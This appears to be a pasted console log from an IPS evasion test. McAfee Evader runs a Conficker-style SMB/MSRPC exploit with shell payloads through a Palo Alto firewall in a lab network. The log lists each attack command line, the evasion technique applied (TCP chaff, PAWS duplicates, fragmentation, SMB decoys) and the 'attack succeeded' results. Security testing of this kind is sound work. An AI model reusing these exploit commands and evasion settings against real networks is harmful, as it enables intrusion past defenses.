Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Palo Alto Networks 6.0.5h3 IPS evasion techniques with Mcafee Evader
- Running exploit with command "ruby mongbat.rb --uid=webgui2_8000 --attack=conficker --payload=shell --check_victim=false --iface=eth0 --attacker=10.62.90.75 --victim=10.35.1.207 --gw=10.62.90.3 --mode=random --time=43200 --workers=14 --min_evasions=2 --max_evasions=2 --passthrough --verifydelay=1000"
- 2014-10-27 15:22:24 INFO Using binary /root/evader/evader version 2013.2.586 ( x86, o, evc4 )
- 2014-10-27 15:22:24 INFO Victim check disabled - will NOT notice if victim is no longer running
- 2014-10-27 15:22:26 INFO Using rand seed JQq8JjefWhc=
- 2014-10-27 15:22:26 INFO External Validator: /root/evader/externals/conficker_validator.rb: Validate Conficker against Windows XP SP2
- Starting evasions generator: Random evasions generator (Evasion adding percentage is 0.0028169014084507044)
- 0 runs averaging 0.00 runs / second ; progress: 1/43200.........................2014-10-27 15:22:31 INFO
- Success. (10.62.90.85):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.85 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=30734 --extra=bindport=10010 --verifydelay=200 --obfuscate --randseed=dkmOr3BFy8E --evasion=[smb_opentree,end]smb_decoytrees,"5","3","8","random_msrpcbind" --evasion=[smb_openpipe,msrpc_bind]tcp_chaff,"2","chksum|nullchksum|shorthdr|longhdr","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed dkmOr3BFy8F
- The following evasions are applied from stage smb_opentree to end:
- - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 8 bytes of MSRPC bind-like data.
- The following evasions are applied from stage smb_openpipe to msrpc_bind:
- - With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP checksum.
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has random alphanumeric bytes as payload
- Info: NetBIOS connection 10.62.90.85:30734 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....................
- 47 runs averaging 7.21 runs / second ; progress: 7/43200............................
- 75 runs averaging 6.42 runs / second ; progress: 12/43200...............................
- 106 runs averaging 6.31 runs / second ; progress: 17/43200.......................................
- 145 runs averaging 6.63 runs / second ; progress: 22/43200..................................
- 179 runs averaging 6.63 runs / second ; progress: 27/43200..........................
- 205 runs averaging 6.40 runs / second ; progress: 32/43200.....................2014-10-27 15:23:03 INFO
- Success. (10.62.90.84):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.84 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61157 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=DHLLZZ7NwVU --evasion=[smb_connect,msrpc_bind]ipv4_frag,"48" --evasion=[netbios_connect,msrpc_req]tcp_paws,"75%","268435454","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed DHLLZZ7NwVU
- The following evasions are applied from stage netbios_connect to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alpha bytes as payload
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - IPv4 fragments with at most 48 bytes per fragment
- Info: NetBIOS connection 10.62.90.84:61157 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .2014-10-27 15:23:03 INFO
- Success. (10.62.90.85):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.85 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39930 --extra=bindport=10010 --verifydelay=200 --obfuscate --randseed=cusywtjt92o --evasion=[smb_opentree,end]smb_writeandxpad,"10","zero" --evasion=[smb_openpipe,msrpc_req]tcp_chaff,"2","nullflag","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed cusywtjt92p
- The following evasions are applied from stage smb_opentree to end:
- - 10 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of zero bytes.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * NULL TCP control flags.
- * Duplicate packet has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.85:39930 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ..
- 231 runs averaging 6.22 runs / second ; progress: 37/43200................................
- 263 runs averaging 6.23 runs / second ; progress: 42/43200..........2014-10-27 15:23:11 INFO
- Success. (10.62.90.79):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.79 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15672 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=HZ3Sa7z//Is --evasion=[smb_opentree,smb_openpipe]ipv4_opt,"21","inc","shuffletcp" --evasion=[smb_connect,msrpc_req]tcp_paws,"50%","268435454","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed HZ3Sa7z//Is
- The following evasions are applied from stage smb_connect to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_opentree to smb_openpipe:
- - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled TCP payload
- Info: NetBIOS connection 10.62.90.79:15672 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .............2014-10-27 15:23:13 INFO
- Success. (10.62.90.79):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.79 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17963 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=B6RhIk0V4V8 --evasion=[smb_connect,end]tcp_paws,"75%","9","random_alpha" --evasion=[smb_connect,msrpc_bind]tcp_segvar,"4","53977" --verifydelay=1000 --payload=shell
- Info: Using random seed B6RhIk0V4V8
- The following evasions are applied from stage smb_connect to end:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has random alpha bytes as payload
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - TCP packets are segmented to contain between 4 and 53977 bytes of payload.
- Info: NetBIOS connection 10.62.90.79:17963 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Command shell connection reset.
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Shell closed
- 0: Success.
- ....................
- 308 runs averaging 6.44 runs / second ; progress: 48/43200...........................
- 335 runs averaging 6.33 runs / second ; progress: 53/43200....................
- 355 runs averaging 6.12 runs / second ; progress: 58/43200......
- 361 runs averaging 5.72 runs / second ; progress: 63/43200..2014-10-27 15:23:31 INFO
- Success. (10.62.90.84):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.84 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=37695 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=93wLI55/9xM --evasion=[smb_connect,msrpc_req]netbios_chaff,"2","empty_unspec|small_unspec|broken_length" --evasion=[start,msrpc_req]tcp_chaff,"1","nullflag","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 93wLI55/9xP
- The following evasions are applied from stage start to msrpc_req:
- - With every 1 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * NULL TCP control flags.
- * Duplicate packet has random bytes as payload
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before every 2th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- Info: NetBIOS connection 10.62.90.84:37695 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..............
- 378 runs averaging 5.55 runs / second ; progress: 68/43200......................
- 400 runs averaging 5.47 runs / second ; progress: 73/43200..2014-10-27 15:23:40 INFO
- Success. (10.62.90.79):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.79 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=14521 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=20G1uxuzLX0 --evasion=[smb_connect,smb_openpipe]smb_chaff,"21","write_flag","msrpc" --evasion=[smb_opentree,end]tcp_paws,"5","146896369","random" --verifydelay=1000 --payload=shell
- Info: Using random seed 20G1uxuzLX3
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - Before every 21th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- The following evasions are applied from stage smb_opentree to end:
- - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 146896369> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.79:14521 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...............2014-10-27 15:23:43 INFO
- Success. (10.62.90.84):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.84 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=33059 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=yCX702BvsoY --evasion=[start,msrpc_req]tcp_paws,"75%","268435454","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_paws,"13","268435455","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed yCX702Bvsob
- The following evasions are applied from stage start to msrpc_req:
- - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has random alpha bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 13th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.84:33059 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ..............
- 433 runs averaging 5.53 runs / second ; progress: 78/43200....................
- 453 runs averaging 5.44 runs / second ; progress: 83/432002014-10-27 15:23:50 INFO
- Success. (10.62.90.87):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.87 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63063 --extra=bindport=10012 --verifydelay=200 --obfuscate --randseed=BGefIIMzPSI --evasion=[smb_connect,msrpc_bind]tcp_chaff,"13","chksum|nullchksum|nullflag","random_alpha" --evasion=[smb_opentree,msrpc_req]tcp_paws,"1","4","random" --verifydelay=1000 --payload=shell
- Info: Using random seed BGefIIMzPSI
- The following evasions are applied from stage smb_connect to msrpc_bind:
- - With every 13 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * Invalid TCP checksum.
- * NULL TCP checksum.
- * NULL TCP control flags.
- * Duplicate packet has random alpha bytes as payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.87:63063 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- ...............
- 469 runs averaging 5.31 runs / second ; progress: 88/43200.................
- 486 runs averaging 5.21 runs / second ; progress: 93/43200.......................
- 509 runs averaging 5.17 runs / second ; progress: 98/43200..................
- 527 runs averaging 5.10 runs / second ; progress: 103/432002014-10-27 15:24:10 INFO
- Success. (10.62.90.81):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.81 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=21544 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=WcNFwRScpy0 --evasion=[start,end]tcp_paws,"1","18663179","unmodified" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","28078968","random" --verifydelay=1000 --payload=shell
- Info: Using random seed WcNFwRScpy1
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 28078968> and has random bytes as payload
- Info: NetBIOS connection 10.62.90.81:21544 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .........
- 537 runs averaging 4.95 runs / second ; progress: 108/43200...................
- 556 runs averaging 4.90 runs / second ; progress: 113/43200....................
- 576 runs averaging 4.86 runs / second ; progress: 119/43200......2014-10-27 15:24:26 INFO
- Success. (10.62.90.85):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.85 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29127 --extra=bindport=10010 --verifydelay=200 --obfuscate --randseed=blBNPp/vvrI --evasion=[smb_opentree,end]smb_decoytrees,"1","6","9","zero" --evasion=[smb_openpipe,msrpc_req]tcp_paws,"2","268435453","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed blBNPp/vvrJ
- The following evasions are applied from stage smb_opentree to end:
- - Before normal SMB writes, 1 SMB trees are opened and 6 writes are performed to them. The write payload is 9 bytes of zeroes.
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - Every 2th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.85:29127 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ..............
- 597 runs averaging 4.83 runs / second ; progress: 124/43200.......................
- 620 runs averaging 4.82 runs / second ; progress: 129/43200.............................
- 649 runs averaging 4.86 runs / second ; progress: 134/43200.......2014-10-27 15:24:42 INFO
- Success. (10.62.90.85):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.85 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=36155 --extra=bindport=10010 --verifydelay=200 --obfuscate --randseed=wP2OpZACf7k --evasion=[msrpc_req,end]tcp_chaff,"2","shorthdr|longhdr","random_alpha" --evasion=[start,end]tcp_paws,"3","268435455","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed wP2OpZACf7n
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
- The following evasions are applied from stage msrpc_req to end:
- - With every 2 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * TCP header shorter than 20 bytes
- * TCP header longer than packet total size
- * Duplicate packet has random alpha bytes as payload
- Info: NetBIOS connection 10.62.90.85:36155 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ....................
- 677 runs averaging 4.88 runs / second ; progress: 139/43200...2014-10-27 15:24:46 INFO
- Success. (10.62.90.88):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.88 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=21972 --extra=bindport=10013 --verifydelay=200 --obfuscate --randseed=Q9f2ifNXKts --evasion=[smb_openpipe,end]netbios_chaff,"1","empty_keepalive|small_unspec|msrpc_req|broken_length" --evasion=[msrpc_bind,end]tcp_paws,"1","268435453","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed Q9f2ifNXKtt
- The following evasions are applied from stage smb_openpipe to end:
- - Before every 1th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with MSRPC request like payload. The chaff message is an unspecified NetBIOS message with a small payload and an invalid length value.
- The following evasions are applied from stage msrpc_bind to end:
- - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.88:21972 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: Shell closed
- 0: Success.
- .....................
- 702 runs averaging 4.88 runs / second ; progress: 144/43200................
- 718 runs averaging 4.82 runs / second ; progress: 149/43200........
- 726 runs averaging 4.71 runs / second ; progress: 154/43200
- 726 runs averaging 4.57 runs / second ; progress: 159/43200.........
- 735 runs averaging 4.48 runs / second ; progress: 164/43200................
- 751 runs averaging 4.44 runs / second ; progress: 169/43200.......
- 758 runs averaging 4.35 runs / second ; progress: 174/43200...
- 761 runs averaging 4.25 runs / second ; progress: 179/43200..
- 763 runs averaging 4.14 runs / second ; progress: 184/43200..
- 765 runs averaging 4.04 runs / second ; progress: 189/43200..........
- 775 runs averaging 3.99 runs / second ; progress: 194/43200........
- 783 runs averaging 3.93 runs / second ; progress: 199/43200..............
- 797 runs averaging 3.90 runs / second ; progress: 204/43200.........
- 806 runs averaging 3.85 runs / second ; progress: 209/43200...................
- 825 runs averaging 3.85 runs / second ; progress: 214/43200.................
- 842 runs averaging 3.84 runs / second ; progress: 219/43200
- 842 runs averaging 3.75 runs / second ; progress: 224/43200
- 842 runs averaging 3.67 runs / second ; progress: 229/43200......
- 848 runs averaging 3.62 runs / second ; progress: 234/43200.........
- 857 runs averaging 3.58 runs / second ; progress: 239/43200.......
- 864 runs averaging 3.54 runs / second ; progress: 244/43200.....
- 869 runs averaging 3.48 runs / second ; progress: 249/43200............
- 881 runs averaging 3.46 runs / second ; progress: 254/43200........
- 889 runs averaging 3.43 runs / second ; progress: 259/43200.........
- 898 runs averaging 3.40 runs / second ; progress: 264/43200.......
- 905 runs averaging 3.36 runs / second ; progress: 270/43200.........
- 914 runs averaging 3.33 runs / second ; progress: 275/43200............
- 926 runs averaging 3.31 runs / second ; progress: 280/43200..........
- 936 runs averaging 3.29 runs / second ; progress: 285/43200.
- 937 runs averaging 3.24 runs / second ; progress: 290/43200
- 937 runs averaging 3.18 runs / second ; progress: 295/43200............
- 949 runs averaging 3.17 runs / second ; progress: 300/43200......Pid 17651 timed out - killed
- 2014-10-27 15:27:28 INFO
- Timed out (10.62.90.83):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.83 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58677 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=W+mzqbTjctM --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","6","zero" --evasion=[netbios_connect,msrpc_bind]tcp_urgent,"50%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed W+mzqbTjctN
- The following evasions are applied from stage netbios_connect to msrpc_bind:
- - 50% probability to add a random alphanumeric urgent data byte to a TCP segment.
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 0x00 bytes as payload
- Info: NetBIOS connection 10.62.90.83:58677 -> 10.35.1.207:445
- Terminated
- .....2014-10-27 15:27:30 INFO
- Success. (10.62.90.83):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.83 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=29264 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=3Kb05auMcgU --evasion=[smb_connect,msrpc_req]smb_decoytrees,"6","4","2","random_msrpcbind" --evasion=[smb_connect,smb_opentree]tcp_segvar,"1","37859" --verifydelay=1000 --payload=shell
- Info: Using random seed 3Kb05auMcgX
- The following evasions are applied from stage smb_connect to smb_opentree:
- - TCP packets are segmented to contain between 1 and 37859 bytes of payload.
- The following evasions are applied from stage smb_connect to msrpc_req:
- - Before normal SMB writes, 6 SMB trees are opened and 4 writes are performed to them. The write payload is 2 bytes of MSRPC bind-like data.
- Info: NetBIOS connection 10.62.90.83:29264 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- ......
- 968 runs averaging 3.18 runs / second ; progress: 305/43200..............
- 982 runs averaging 3.17 runs / second ; progress: 310/43200.........
- 991 runs averaging 3.15 runs / second ; progress: 315/43200...Pid 18473 timed out - killed
- 2014-10-27 15:27:43 INFO
- Timed out (10.62.90.77):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.77 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=45861 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=4kN/lpcvPRQ --evasion=[msrpc_req,end]smb_chaff,"5","write_flag","msrpc" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed 4kN/lpcvPRT
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a zero urgent data byte to every 2 TCP segment.
- The following evasions are applied from stage msrpc_req to end:
- - Before every 5th SMB message an SMB chaff message is sent. The chaff is a WriteAndX message with a broken write mode flag, and has random MSRPC request-like payload
- Info: NetBIOS connection 10.62.90.77:45861 -> 10.35.1.207:445
- Terminated
- ...2014-10-27 15:27:44 INFO
- Success. (10.62.90.81):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.81 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=31447 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=VbhSzUOE56A --evasion=[start,smb_connect]ipv4_opt,"21","inc","shuffletcp" --evasion=[smb_opentree,msrpc_req]tcp_paws,"50%","639943","alpharandomized" --verifydelay=1000 --payload=shell
- Info: Using random seed VbhSzUOE56B
- The following evasions are applied from stage start to smb_connect:
- - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
- The duplicate packet has shuffled TCP payload
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 639943> and has original payload with alphabetic bytes randomized
- Info: NetBIOS connection 10.62.90.81:31447 -> 10.35.1.207:445
- Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
- Info: Sending MSRPC request with exploit
- Info: Shell found, attack succeeded
- Info: CommandShell::SendCommand() - Failed to send string
- Info: Command shell connection reset.
- Info: Shell closed
- 0: Success.
- .Pid 18612 timed out - killed
- 2014-10-27 15:27:45 INFO
- Timed out (10.62.90.78):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.78 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=58917 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=tpwjgTYiV8k --evasion=[start,end]tcp_initialseq,"2" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","zero" --verifydelay=1000 --payload=shell
- Info: Using random seed tpwjgTYiV8m
- - Initial TCP sequence number is set to 0xffffffff - 2
- The following evasions are applied from stage smb_opentree to msrpc_req:
- - Add a zero urgent data byte to every 2 TCP segment.
- Info: NetBIOS connection 10.62.90.78:58917 -> 10.35.1.207:445
- Terminated
- .....Pid 18682 timed out - killed
- 2014-10-27 15:27:46 INFO
- Timed out (10.62.90.76):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.76 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=63099 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=wnzVAmbFo1U --evasion=[netbios_connect,smb_connect]tcp_chaff,"8","nullchksum|shorthdr","alphanumrandomized" --evasion=[smb_openpipe,msrpc_req]tcp_urgent,"25%","random_alpha" --verifydelay=1000 --payload=shell
- Info: Using random seed wnzVAmbFo1X
- The following evasions are applied from stage netbios_connect to smb_connect:
- - With every 8 TCP packet a TCP chaff packet is sent. The chaff packet has:
- * NULL TCP checksum.
- * TCP header shorter than 20 bytes
- * Duplicate packet has original payload with alphanumeric bytes randomized
- The following evasions are applied from stage smb_openpipe to msrpc_req:
- - 25% probability to add a random alphaurgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.76:63099 -> 10.35.1.207:445
- Terminated
- .
- 1008 runs averaging 3.15 runs / second ; progress: 320/43200..........................
- 1034 runs averaging 3.18 runs / second ; progress: 325/43200..Pid 19009 timed out - killed
- 2014-10-27 15:27:52 INFO
- Timed out (10.62.90.75):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.75 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=61686 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=5R1r/jbFmrw --evasion=[smb_connect,smb_openpipe]ipv4_opt,"25%","inc","random_alphanum" --evasion=[smb_openpipe,end]tcp_urgent,"75%","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed 5R1r/jbFmrz
- The following evasions are applied from stage smb_connect to smb_openpipe:
- - 25% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
- The duplicate packet has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_openpipe to end:
- - 75% probability to add a random alphanumeric urgent data byte to a TCP segment.
- Info: NetBIOS connection 10.62.90.75:61686 -> 10.35.1.207:445
- Terminated
- ..........
- 1047 runs averaging 3.17 runs / second ; progress: 330/43200......
- 1053 runs averaging 3.14 runs / second ; progress: 335/43200......................
- 1075 runs averaging 3.16 runs / second ; progress: 340/43200......................
- 1097 runs averaging 3.18 runs / second ; progress: 345/43200............Pid 20186 timed out - killed
- 2014-10-27 15:28:15 INFO
- Timed out (10.62.90.82):
- /root/evader/evader --uid=mongbat_17415_webgui2_8000 --if=eth0 --src_ip=10.62.90.82 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=16086 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=P9jJCqtzPWA --evasion=[smb_connect,smb_opentree]smb_decoytrees,"2","7","2","zero" --evasion=[netbios_connect,end]tcp_paws,"3","3","random_alphanum" --verifydelay=1000 --payload=shell
- Info: Using random seed P9jJCqtzPWA
- The following evasions are applied from stage netbios_connect to end:
- - Every 3th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alphanumeric bytes as payload
- The following evasions are applied from stage smb_connect to smb_opentree:
- - Before normal SMB writes, 2 SMB trees are opened and 7 writes are performed to them. The write payload is 2 bytes of zeroes.
- Info: NetBIOS connection 10.62.90.82:16086 -> 10.35.1.207:445
- Terminated
- .........2014-10-27 15:28:16 INFO
- Success. (10.62.90.79):
- 18927 runs averaging 2.89 runs / second ; progress: 6539/43200.....Interrupt registered, soft shutdown
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement